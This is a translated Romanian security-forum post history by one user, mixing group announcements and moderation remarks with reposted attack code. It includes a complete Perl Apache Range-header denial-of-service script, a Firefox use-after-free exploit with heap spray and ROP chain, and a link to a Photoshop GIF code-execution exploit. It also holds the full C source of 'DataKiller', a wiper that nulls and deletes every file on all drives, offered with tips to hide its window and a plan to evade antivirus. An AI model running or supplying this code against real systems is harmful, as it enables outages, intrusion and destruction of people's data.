Posts: 18785
Days Won: 738
Everything posted by Nytro
-
Even better: http://rstcenter.com/forum/39386-powergrep-4-a.rst
-
PowerGREP is a powerful Windows grep tool. Quickly search through large numbers of files on your PC or network, including text and binary files, compressed archives, MS Word documents, Excel spreadsheets, PDF files, OpenOffice files, etc. Find the information you want with powerful text patterns (regular expressions) specifying the form of what you want, instead of literal text. Search and replace with one or many regular expressions to comprehensively maintain web sites, source code, reports, etc. Extract statistics and knowledge from log files and large data sets.

Very useful for searching files using regular expressions; it is not hard to use at all and has a ton of options. I don't know whether it is infected; I use it and have had no problems.

Screenshot from the official site: http://www.powergrep.com/screens/powergrep.png

It is portable, no installation needed.

Download: http://www.multiupload.com/Q5VT2RWE8Y
-
Adobe Photoshop CS5 GIF Remote Code Execution

#####################################################################################
Application: Adobe Photoshop CS5 GIF Remote Code Execution
Platforms: Adobe Photoshop CS5 (12.0 and 12.1)
Exploitation: Remote code execution
CVE Number: CVE-2011-2131
Adobe Vulnerability Identifier: APSB11-22
{PRL}: 2011-08
Author: Francis Provencher (Protek Research Lab's)
Website: http://www.protekresearchlab.com/
Twitter: @ProtekResearch
#####################################################################################
1) Introduction
2) Timeline
3) Technical details
4) PoC
#####################################################################################
===============
1) Introduction
===============
Adobe Photoshop is a graphics editing program developed and published by Adobe Systems Incorporated. Adobe's 2003 "Creative Suite" rebranding led to Adobe Photoshop 8's renaming to Adobe Photoshop CS. Thus, Adobe Photoshop CS5 is the 12th major release of Adobe Photoshop. The CS rebranding also resulted in Adobe offering numerous software packages containing multiple Adobe programs for a reduced price. Adobe Photoshop is released in two editions: Adobe Photoshop, and Adobe Photoshop Extended, with the Extended having extra 3D image creation, motion graphics editing, and advanced image analysis features. Adobe Photoshop Extended is included in all of Adobe's Creative Suite offerings except Design Standard, which includes the Adobe Photoshop edition.
http://en.wikipedia.org/wiki/Adobe_Photoshop
#####################################################################################
============================
2) Timeline
============================
2011-06-14 - Vulnerability reported to vendor
2011-09-09 - Coordinated public release of advisory
#####################################################################################
============================
3) Technical details
============================
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe PhotoShop CS5. User interaction is required to exploit this vulnerability in that the target must open a malicious GIF file. When the "ushort ImageHeight" is crafted with an invalid value the memory is corrupted and arbitrary code can be run on the remote host.
#####################################################################################
===========
4) The Code
===========
http://www.protekresearchlab.com/exploits/PRL-2011-08.gif
http://exploit-db.com/sploits/17712.zip

Source: Adobe Photoshop CS5 GIF Remote Code Execution

When I get home I'll test it too; I think I had Photoshop CS5...
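A defender-side check for the field the advisory names, added here as an example (not code from the advisory or from Adobe): it walks a GIF's block structure and flags Image Descriptors with implausible geometry before the file reaches an image editor. The advisory does not say which ImageHeight values are invalid, so the rules used (zero dimensions, frame extending past the logical screen) are assumptions; `audit_gif` and `build_sample` are hypothetical names and the sample files are constructed.

```python
import struct


def _color_table_len(packed):
    """Bytes taken by a colour table announced in a packed-fields byte."""
    return 3 * (2 << (packed & 0x07)) if packed & 0x80 else 0


def _skip_sub_blocks(data, pos):
    """Skip a chain of length-prefixed sub-blocks; return the offset after it."""
    while pos < len(data):
        size = data[pos]
        pos += 1 + size
        if size == 0:
            return pos
    raise ValueError("truncated sub-block chain")


def audit_gif(data):
    """Return [(frame_index, issue)] for frames with suspicious geometry."""
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF file")
    # Logical Screen Descriptor: width, height (little-endian ushort), packed
    screen_w, screen_h, packed = struct.unpack_from("<HHB", data, 6)
    pos = 13 + _color_table_len(packed)
    findings, frame = [], 0
    while pos < len(data):
        marker = data[pos]
        if marker == 0x3B:            # trailer: end of file
            return findings
        if marker == 0x21:            # extension: label byte, then sub-blocks
            pos = _skip_sub_blocks(data, pos + 2)
        elif marker == 0x2C:          # Image Descriptor
            if pos + 10 > len(data):
                raise ValueError("truncated image descriptor")
            left, top, width, height, ipacked = struct.unpack_from(
                "<HHHHB", data, pos + 1)
            # Assumed triage rules; the advisory gives no definition.
            if width == 0 or height == 0:
                findings.append((frame, "zero-dimension"))
            if top + height > screen_h:
                findings.append((frame, "exceeds-screen-height"))
            if left + width > screen_w:
                findings.append((frame, "exceeds-screen-width"))
            # Skip local colour table, LZW minimum code size, image data.
            pos = _skip_sub_blocks(
                data, pos + 10 + _color_table_len(ipacked) + 1)
            frame += 1
        else:
            raise ValueError("unknown block 0x%02x at offset %d" % (marker, pos))
    raise ValueError("missing trailer")


def build_sample(image_height):
    """Constructed one-frame GIF on a 4x4 logical screen (pixel data is dummy)."""
    return (b"GIF89a"
            + struct.pack("<HHBBB", 4, 4, 0, 0, 0)                  # screen
            + b"\x2c" + struct.pack("<HHHHB", 0, 0, 4, image_height, 0)
            + b"\x02"                                               # LZW min code size
            + b"\x01\x00" + b"\x00"                                 # one sub-block, terminator
            + b"\x3b")                                              # trailer


if __name__ == "__main__":
    for h in (4, 0, 0xFFFF):
        print(h, audit_gif(build_sample(h)))
```

Real-world GIFs occasionally carry frames slightly larger than the logical screen, so a finding is a reason to quarantine and inspect the file, not proof of an exploit attempt.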
-
Personal attacks, swearing... are punished. If I don't see it myself (which is very possible, I don't have time to read all the posts), you can send me a PM and it will be dealt with.
-
I want links... A "plm" thrown in there doesn't bother me; I don't think that's a problem. If there is swearing, then yes, a warning is given. Well, in offtopic I don't bother giving warnings; I'm not very interested in that category. I want to see examples of posts with inappropriate language.
-
New group members:
- Xander - PHP Coder
- silvian0 - PHP Coder
- Gecko - Designer
- denjacker - Web Vulnerability Master - Leader

I think 2 are on the waiting list; it remains to be seen over the next few days whether or not they will be recruited.
-
Offtopic, don't ruin the topic.
-
Update: DataKiller v0.2

What's new:
- Safe file delete

See the first post for more information.
-
I don't know if signatures are worth it, but if anyone needs graphics, images or anything else for a project, I think the Designers will be glad to help.
-
Apache httpd Remote Denial of Service (memory exhaustion)

#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;

sub usage {
    print "Apache Remote Denial of Service (memory exhaustion)\n";
    print "by Kingcope\n";
    print "usage: perl killapache.pl <host> [numforks]\n";
    print "example: perl killapache.pl www.example.com 50\n";
}

sub killapache {
    print "ATTACKING $ARGV[0] [using $numforks forks]\n";

    $pm = new Parallel::ForkManager($numforks);

    $|=1;
    srand(time());
    $p = "";
    for ($k=0;$k<1300;$k++) {
        $p .= ",5-$k";
    }

    for ($k=0;$k<$numforks;$k++) {
        my $pid = $pm->start and next;

        $x = "";
        my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                         PeerPort => "80",
                                         Proto    => 'tcp');

        $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
        print $sock $p;

        while(<$sock>) {
        }
        $pm->finish;
    }
    $pm->wait_all_children;
    print ":pPpPpppPpPPppPpppPp\n";
}

sub testapache {
    my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                     PeerPort => "80",
                                     Proto    => 'tcp');

    $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
    print $sock $p;

    $x = <$sock>;
    if ($x =~ /Partial/) {
        print "host seems vuln\n";
        return 1;
    } else {
        return 0;
    }
}

if ($#ARGV < 0) {
    usage;
    exit;
}

if ($#ARGV > 1) {
    $numforks = $ARGV[1];
} else {$numforks = 50;}

$v = testapache();
if ($v == 0) {
    print "Host does not seem vulnerable\n";
    exit;
}
while(1) {
    killapache();
}

Looks promising...

Source: Apache httpd Remote Denial of Service (memory exhaustion)
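For the detection side of the Range header built by the script above, an added example (not part of the original post or of Apache): it parses a `Range` header value, counts the byte ranges and how many overlap or are inverted, and flags requests over a policy limit. The function names and the limit of 5 ranges are assumptions of this example; the sample header values are constructed, the first one in the shape the script produces.

```python
import math
import re

MAX_RANGES = 5  # assumed policy threshold for this example

_SPEC = re.compile(r"^(\d*)-(\d*)$")


def parse_range_header(value):
    """Parse 'bytes=a-b,c-,-n' into [(first, last)]; None marks an open end."""
    unit, sep, specs = value.partition("=")
    if not sep or unit.strip().lower() != "bytes":
        raise ValueError("unsupported range unit")
    parsed = []
    for raw in specs.split(","):
        raw = raw.strip()
        if not raw:
            continue  # empty list elements are tolerated
        m = _SPEC.match(raw)
        if not m or not (m.group(1) or m.group(2)):
            raise ValueError("malformed range-spec: %r" % raw)
        first = int(m.group(1)) if m.group(1) else None
        last = int(m.group(2)) if m.group(2) else None
        parsed.append((first, last))
    return parsed


def assess_range_header(value, max_ranges=MAX_RANGES):
    """Summarise a Range header for logging or blocking decisions."""
    ranges = parse_range_header(value)
    inverted = 0
    intervals = []
    for first, last in ranges:
        if first is None:
            continue  # suffix range: position unknown without the length
        if last is not None and last < first:
            inverted += 1  # e.g. "5-0": last byte before first byte
            continue
        intervals.append((first, math.inf if last is None else last))
    # Count intervals that start inside the span covered so far.
    intervals.sort()
    overlapping = 0
    max_end = -1
    for start, end in intervals:
        if start <= max_end:
            overlapping += 1
        max_end = max(max_end, end)
    return {
        "count": len(ranges),
        "inverted": inverted,
        "overlapping": overlapping,
        "suspicious": len(ranges) > max_ranges or overlapping > 0,
    }


# Constructed samples: the first has the shape built by the script in the post.
SAMPLE_FLOOD = "bytes=0-" + "".join(",5-%d" % k for k in range(1300))
SAMPLE_NORMAL = "bytes=0-1023"
SAMPLE_MULTI = "bytes=0-99,200-299"

if __name__ == "__main__":
    for name, hdr in (("flood", SAMPLE_FLOOD), ("normal", SAMPLE_NORMAL),
                      ("multi", SAMPLE_MULTI)):
        print(name, assess_range_header(hdr))
```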
-
Florin Salam - Cap si pajura 2011 (Live Club One Million Timisoara) - YouTube
-
I did think about the option to exclude the Windows partition. But there may be other files there too. I think I will add an option to skip ?:/Windows and ?:/Program Files, since Documents And Settings also holds data, as does /Users on Windows 7. But I think I'm complicating things for nothing. I'll think about it some more, and when I have more free time I'll work on it further.
-
Whoever wants to be recruited into that group, add "grupuri_rst" and we'll talk. And we'll also see how much they understand of what they're doing.
-
It won't "be all the rage"; it will just be more complex and more useful. I'm waiting for ideas and suggestions; as for the implementation, those in the C/C++ coder group will be able to contribute.
-
Yes, I'm sure that if they see "[G] Java Programmer" instead of "Java Programmers", even if it's their first time on RST they will say: "Aaah, right, now I get it, it's about those groups I don't know about, but "G" stands for groups and that cleared it up for me". There's no point; maybe I'll put them in italics, a distinct style; for now it isn't necessary.
-
"Registered user" != "Java Programmer" != "VIP"

Even if you get a child who can't read to look at it, they will realize it's not the same thing.

PS: Those with the VIP rank now have the group's status (Linux...), but also the VIP permissions.
-
Name: DataKiller
Description: Deletes all files
Author: C/C++ Coder group @ Romanian Security Team
Size: 8.5 KB

Warning! Do not run this executable; it will try to delete all files!

A more detailed description: some time ago someone asked me for a program like this and it seemed like an interesting idea. This is the second version; I intend to add a few useful options (to delete only pictures, for example).

What's new:
- Safe File Delete

It's nothing complicated, but it can be very useful. The only thing it does is replace all the data in the files that are about to be deleted with NULL. So a file containing "aaa" will contain "NULL,NULL,NULL" and will then be deleted. In case you didn't know, when you Delete a file, the data in the file is not erased; only the link to that file is removed, while the data stays on the hard disk and can be partially or fully recovered. With this option it can no longer be recovered, but the program will take MUCH longer to run and will use more resources. It will take over 30 minutes, depending on the size and number of files on the computer. I estimate a run would take about 1-2 hours.

And I have a few ideas for the future anyway. It is the only option implemented, but as you can see in the source I have a few more ideas to put into practice.

There's no point hiding the source code; the problem is that it isn't extraordinarily well written, I didn't make an effort to optimize it.
DataKiller.c

/*
    Name: DataKiller.c
    Description: Delete all deleteable files
    Authors: Grupul C/C++ Coder @ Romanian Security Team
    Info: Not all options have been implemented
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* User-defined settings - you can change the values */

int safe_file_delete = 1;            /* "-[n]sf" Delete the file so that it cannot be recovered */
int safe_delete_file_info = 0;       /* "-[n]si" Also delete the information about the file */
int delete_all_files = 1;            /* "-[n]da" Delete all files */
int delete_all_images = 1;           /* "-[n]di" Delete all images */
int delete_all_media = 1;            /* "-[n]dm" Delete all songs and videos */
int delete_all_documents = 1;        /* "-[n]dd" Delete all documents */
int exclude_windows_partition = 0;   /* "-[n]ew" Do not delete anything from the Windows partition */

/* Buffer sizes */

#define VOLNAME_SIZE 4
#define VOLBUFFER_SIZE 1337
#define DIRBUFFER_SIZE 255
#define FILENAME_SIZE 31337

/* Counters for the number of files and folders - statistics */

int nr_files = 0;
int nr_directories = 0;
int deleted_files = 0;
int deleted_directories = 0;

/* The function replaces the data in a file with 0 (NULL) */

void NullFile(const char *fisier)
{
    HANDLE hFisier = NULL;
    DWORD file_size = 0;
    DWORD file_size_2 = 0, written = 0;
    unsigned char *buf = NULL;

    SetFileAttributes(fisier, FILE_ATTRIBUTE_NORMAL);

    hFisier = CreateFile(fisier, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING,
        FILE_ATTRIBUTE_ARCHIVE | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_NORMAL |
        FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM, NULL);

    if(hFisier != INVALID_HANDLE_VALUE)
    {
        file_size = GetFileSize(hFisier, &file_size_2);

        /* Null out the file so that the data cannot be recovered */

        buf = (unsigned char *)malloc(file_size);
        memset(buf, 0, file_size);

        WriteFile(hFisier, buf, file_size, &written, NULL);

        free(buf);
        CloseHandle(hFisier);
    }
}

/* Recursive function, deletes folders and files */

void DeleteFiles(char *directory)
{
    WIN32_FIND_DATA file_data;
    HANDLE hFisier;
    int new_file = 1;
    char dir_buffer[DIRBUFFER_SIZE] = {0};
    char file_name[FILENAME_SIZE] = {0};
    char new_dir[DIRBUFFER_SIZE] = {0};

    /* Build the string for FindFirstFile */

    memset(&file_data, 0, sizeof(WIN32_FIND_DATA));
    sprintf(dir_buffer, "%s*", directory);

    hFisier = FindFirstFile(dir_buffer, &file_data);

    /* Walk the folder */

    while(hFisier != INVALID_HANDLE_VALUE && new_file)
    {
        sprintf(file_name, "%s%s", directory, file_data.cFileName);

        /* If it is a folder */

        if(GetFileAttributes(file_name) & ~(FILE_ATTRIBUTE_DIRECTORY ^ 0xFFFFFFFF) &&
           (GetFileAttributes(file_name) != (unsigned)-1))
        {
            sprintf(new_dir, "%s\\", file_name);

            /* Skip "." and ".." */

            if(file_name[strlen(file_name) - 1] != '.')
            {
                nr_directories++;
                DeleteFiles(new_dir);
                if(RemoveDirectory(new_dir)) deleted_directories++;
            }
        }

        /* If it is a file */

        else
        {
            nr_files++;
            if(safe_file_delete) NullFile(file_name);
            if(DeleteFile(file_name)) deleted_files++;
        }

        /* Move on to the next file/folder */

        new_file = FindNextFile(hFisier, &file_data);
    }

    FindClose(hFisier);
}

int main(int argc, char *argv[])
{
    char *dir_buffer = NULL;
    char **drives = NULL;
    int dir_buf_size = 0, nr_drives = 0, i = 0, a = 0;

    /* Check the command-line parameters */

    if(argc > 1)
    {
        for(a = 1; a < argc; a++)
        {
            /* Take each parameter in turn */

            if(strcmp(argv[a], "-sf") == 0) safe_file_delete = 1;
            else if(strcmp(argv[a], "-nsf") == 0) safe_file_delete = 0;
            else if(strcmp(argv[a], "-si") == 0) safe_delete_file_info = 1;
            else if(strcmp(argv[a], "-nsi") == 0) safe_delete_file_info = 0;
            else if(strcmp(argv[a], "-da") == 0) delete_all_files = 1;
            else if(strcmp(argv[a], "-nda") == 0) delete_all_files = 0;
            else if(strcmp(argv[a], "-di") == 0) delete_all_images = 1;
            else if(strcmp(argv[a], "-ndi") == 0) delete_all_images = 0;
            else if(strcmp(argv[a], "-dm") == 0) delete_all_media = 1;
            else if(strcmp(argv[a], "-ndm") == 0) delete_all_media = 0;
            else if(strcmp(argv[a], "-dd") == 0) delete_all_documents = 1;
            else if(strcmp(argv[a], "-ndd") == 0) delete_all_documents = 0;
            else if(strcmp(argv[a], "-ew") == 0) exclude_windows_partition = 1;
            else if(strcmp(argv[a], "-new") == 0) exclude_windows_partition = 0;
        }
    }

    /* Allocate memory */

    dir_buffer = (char *)malloc(VOLBUFFER_SIZE);
    dir_buf_size = GetLogicalDriveStrings(VOLBUFFER_SIZE, dir_buffer);
    nr_drives = dir_buf_size / VOLNAME_SIZE;
    drives = (char **)malloc(sizeof(char *) * nr_drives);

    /* Walk the volumes */

    for(i = 0; i < dir_buf_size / VOLNAME_SIZE; i++)
    {
        drives[i] = (char *)malloc(VOLNAME_SIZE);
        strncpy(drives[i], dir_buffer + i * VOLNAME_SIZE, VOLNAME_SIZE);

        printf("Drive: %s: %d\n", drives[i], GetDriveType(drives[i]));

        if(GetDriveType(drives[i]) == DRIVE_FIXED || GetDriveType(drives[i]) == DRIVE_REMOVABLE)
            DeleteFiles(drives[i]);
    }

    printf("Foldere: %d\nFisiere: %d\n", nr_directories, nr_files);
    printf("Foldere sterse: %d\nFisiere sterse: %d\n", deleted_directories, deleted_files);

    /* Free the memory */

    for(i = 0; i < nr_drives; i++) free(drives[i]);
    free(drives);
    free(dir_buffer);

    return 0;
}

Pastebin: [C] DataKiller.c - Pastebin.com

If you want to compile it, compile it with the "-mwindows" linker option so that CMD does not open when it is run. I also compiled it with size optimizations, "-s" and "-Os".

Usage? I think you will find one yourselves; I think plenty of people will find it "useful".

The bad part, from what I can see, is that it is detectable...
http://www.virustotal.com/file-scan/report.html?id=b0d3d314fa0de3e4041e16525017a7960641a089cd7bf5a887ccb9ec53d935df-1313949171

I will work on that aspect too. The point is that you can compile it from source, so you don't think I posted something else.

Download:
http://www.girlshare.ro/2529741.5
http://www.speedyshare.com/files/29969756/DataKiller.exe
http://www.megaupload.com/?d=S88LSQH1
http://www.mediafire.com/?ti4gvi9nnj7g91q
http://www.multiupload.com/DOTY3PVTX3

I know, it's trivial, stupid and unethical; I don't need something like this but some people might. Be bad!
-
New group members:
- sql.breaker - PHP
- Usr6 - Malware analyzer
- Gabriel87 - Designer
- gigaevil - C++ Coder

Temporary change: the Web Designer group is part of the Designer group.

The list so far, with everyone:

PHP Coder
- Synthesis - Leader
- GarryOne - Member
- sql.breaker - Member

Java Programmer
- M2G - Leader
- em - Member

Linux Administrator
- Zatarra - Leader
- BGS - Member
- Spock - Member
- adonisslanic - Member

VB6 Programmer
- Wav3 - Leader

Malware analyzer
- Paul4Games
- Usr6

Windows Administrator
- wildchild - Leader

Python Coder
- cmin - Leader
- python3 - Member

Designer
- Surge - Leader
- robertutzu
- Gabriel87

.NET Programmer
- Alien - Leader

C/C++ Programmer
- Nytro - Leader
- Pantrunjel - Member
- gigaevil - Member

All leaders are asked to contact me so we can talk about projects and future plans.
-
Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)
Nytro replied to Nytro's topic in Exploituri
I tried it on Windows 7 but with Mozilla 3.6.15, and it crashed without executing the shellcode.
-
Wordpress plugins exploits

Author: Exploits by Miroslav Stampar « Exploit Database

List:
WordPress WP DS FAQ plugin <= 1.3.2 SQL Injection Vulnerability
WordPress WP Forum plugin <= 1.7.8 SQL Injection Vulnerability
WordPress Ajax Gallery plugin <= 3.0 SQL Injection Vulnerability
WordPress Global Content Blocks plugin <= 1.2 SQL Injection Vulnerability
WordPress Allow PHP in Posts and Pages plugin <= 2.0.0.RC1 SQL Injection Vulnerability
WordPress Menu Creator plugin <= 1.1.7 SQL Injection Vulnerability
WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability
WordPress Contus HD FLV Player plugin <= 1.3 SQL Injection Vulnerability
WordPress WP Symposium plugin <= 0.64 SQL Injection Vulnerability
WordPress Easy Contact Form Lite plugin <= 1.0.7 SQLi
WordPress OdiHost Newsletter plugin <= 1.0 SQL Injection Vulnerability

Source: Exploits by Miroslav Stampar « Exploit Database
-
Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)

<html>
<body>
<applet code="rubik.class" width=140 height=140></applet>
<p><b>Mozilla mChannel Object use after free</b><br />
- Found by regenrecht<br />
- MSF exploit by Rh0<br />
- Win 7 fun version by mr_me</p>
<!--
Notes:
- This exploit requires <= java 6 update 25.
- optimized heap spray and still works on multiple tabs as the spray is large enough to hit the 0x10000000 block.
- If you really want the class file you can get it here: http://javaboutique.internet.com/Rubik/rubik.class, but java still loads without it.
- Tested on windows 7 ultimate (latest updates).
- http://bit.ly/qD4Jkc
-->
<object id="d"><object>
<script type="text/javascript">
function trigger(){
    alert('ready?');

    fakeobject = document.getElementById("d"); // allocate the object
    fakeobject.QueryInterface(Components.interfaces.nsIChannelEventSink); // append to the objects available functions
    fakeobject.onChannelRedirect(null,new Object,0); // free it

    /*
    fill the object with a fake vtable reference
    just use the start of a block for simplicity and use \x00
    because it expands to a NULL so that
    when we have the CALL DWORD PTR DS:[ECX+18], it will point to 0x10000000
    */
    fakevtable = unescape("\x00%u1000");

    var rop = "";
    // 3 instructions to pivot cleanly
    rop += unescape("%u1033%u6d7f"); // 0x6D7F1033 -> MOV EAX,[ECX] / PUSH EDI / CALL [EAX+4] <jvm.dll>
    rop += unescape("%u10a7%u6d7f"); // 0x6D7F10A7 -> POP EBP / RETN <jvm.dll>
    rop += unescape("%u1441%u6d7f"); // 0x6D7F1441 -> XCHG EAX,ESP / RETN <jvm.dll>
    // generic rop taken from MSVCR71.dll (thanks to corelanc0d3r)
    rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN
    rop += unescape("%ua140%u7c37"); // 0x7c37a140 -> Make EAX readable
    rop += unescape("%u591f%u7c37"); // 0x7c37591f -> PUSH ESP / ... / POP ECX / POP EBP / RETN
    rop += unescape("%uf004%ubeef"); // 0x41414141 -> EBP (filler)
    rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN
    rop += unescape("%ua140%u7c37"); // 0x7c37a140 -> *&VirtualProtect()
    rop += unescape("%u30ea%u7c35"); // 0x7c3530ea -> MOV EAX,[EAX] / RETN
    rop += unescape("%u6c0b%u7c34"); // 0x7c346c0b -> Slide, so next gadget would write to correct stack location
    rop += unescape("%u6069%u7c37"); // 0x7c376069 -> MOV [ECX+1C],EAX / POP EDI / POP ESI / POP EBX / RETN
    rop += unescape("%uf00d%ubeef"); // 0x41414141 -> EDI (filler)
    rop += unescape("%uf00d%ubeef"); // 0x41414141 -> will be patched at runtime (VP), then picked up into ESI
    rop += unescape("%uf00d%ubeef"); // 0x41414141 -> EBX (filler)
    rop += unescape("%u6402%u7c37"); // 0x7c376402 -> POP EBP / RETN
    rop += unescape("%u5c30%u7c34"); // 0x7c345c30 -> ptr to 'push esp / ret '
    rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN
    rop += unescape("%udfff%uffff"); // 0xfffffdff -> size 0x00000201 -> ebx, modify if needed
    rop += unescape("%u1e05%u7c35"); // 0x7c351e05 -> NEG EAX / RETN
    rop += unescape("%u4901%u7c35"); // 0x7c354901 -> POP EBX / RETN
    rop += unescape("%uffff%uffff"); // 0xffffffff -> pop value into ebx
    rop += unescape("%u5255%u7c34"); // 0x7c345255 -> INC EBX / FPATAN / RETN
    rop += unescape("%u2174%u7c35"); // 0x7c352174 -> ADD EBX,EAX / XOR EAX,EAX / INC EAX / RETN
    rop += unescape("%ud201%u7c34"); // 0x7c34d201 -> POP ECX / RETN
    rop += unescape("%ub001%u7c38"); // 0x7c38b001 -> RW pointer (lpOldProtect) (-> ecx)
    rop += unescape("%ub8d7%u7c34"); // 0x7c34b8d7 -> POP EDI / RETN
    rop += unescape("%ub8d8%u7c34"); // 0x7c34b8d8 -> ROP NOP (-> edi)
    rop += unescape("%u4f87%u7c34"); // 0x7c344f87 -> POP EDX / RETN
    rop += unescape("%uffc0%uffff"); // 0xffffffc0 -> value to negate, target value : 0x00000040, target: edx
    rop += unescape("%u1eb1%u7c35"); // 0x7c351eb1 -> NEG EDX / RETN
    rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN
    rop += unescape("%u9090%u9090"); // 0x90909090 -> NOPS (-> eax)
    rop += unescape("%u8c81%u7c37"); // 0x7c378c81 -> PUSHAD / ADD AL,0EF / RETN

    sc = rop;
    // nice big 'calccode' (0x400 bytes)
    // [encoded shellcode string removed]

    // create a string with a ptr to the offset of our rop
    // used 0x1000001c to accommodate 0x18 + 0x4 (1st rop gadget)
    var filler = unescape("%u001c%u1000");
    while(filler.length < 0x100) {filler += filler;}

    /*
    create a string with 0x18 bytes at the start containing ptr's to the rop.
    This is to account for the vtable offset (0x18) -> 'CALL DWORD PTR DS:[ECX+18]'
    Then fill with sc + junk
    */
    var chunk = filler.substring(0,0x18/2);
    chunk += sc;
    chunk += filler;

    // create a string of size 64k in memory that contains sc + filler
    var heapblock = chunk.substring(0,0x10000/2);

    // keep adding more memory that contains sc + filler to reach 512kB
    while (heapblock.length<0x80000) {heapblock += heapblock;}

    /*
    using a final string of 512kB so that the spray is fast but ensuring accuracy
    - sub the block header length (0x24)
    - sub 1/4 of a page for sc (0x400)
    - sub the string length (0x04)
    - sub the null byte terminator
    */
    var finalspray = heapblock.substring(0,0x80000 - sc.length - 0x24/2 - 0x4/2 - 0x2/2);

    // optimised spray, precision can still be reliable even with tabs.
    // force allocation here of 128 blocks, using only 64MB of memory, speeeeeeed.
    arrayOfHeapBlocks = new Array()
    for (n=0;n<0x80;n++){
        arrayOfHeapBlocks[n] = finalspray + sc;
    }
}

trigger();
</script>
</body>
</html>

Does anyone have an older version of Mozilla to test it? If I don't forget, I'll test it myself when I get home; I think there are plenty of people who have old versions of Mozilla.

Source: Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)
-
It depends on the person; I, for one, would be happy with something like that. I need at most 1 GB of RAM, a 2.5 GHz processor and a video card worth 2 lei. But I don't play games, except a Counter-Strike once in a blue moon. If you're not a gamer and don't want anything special from a computer, as I for example don't, it's good.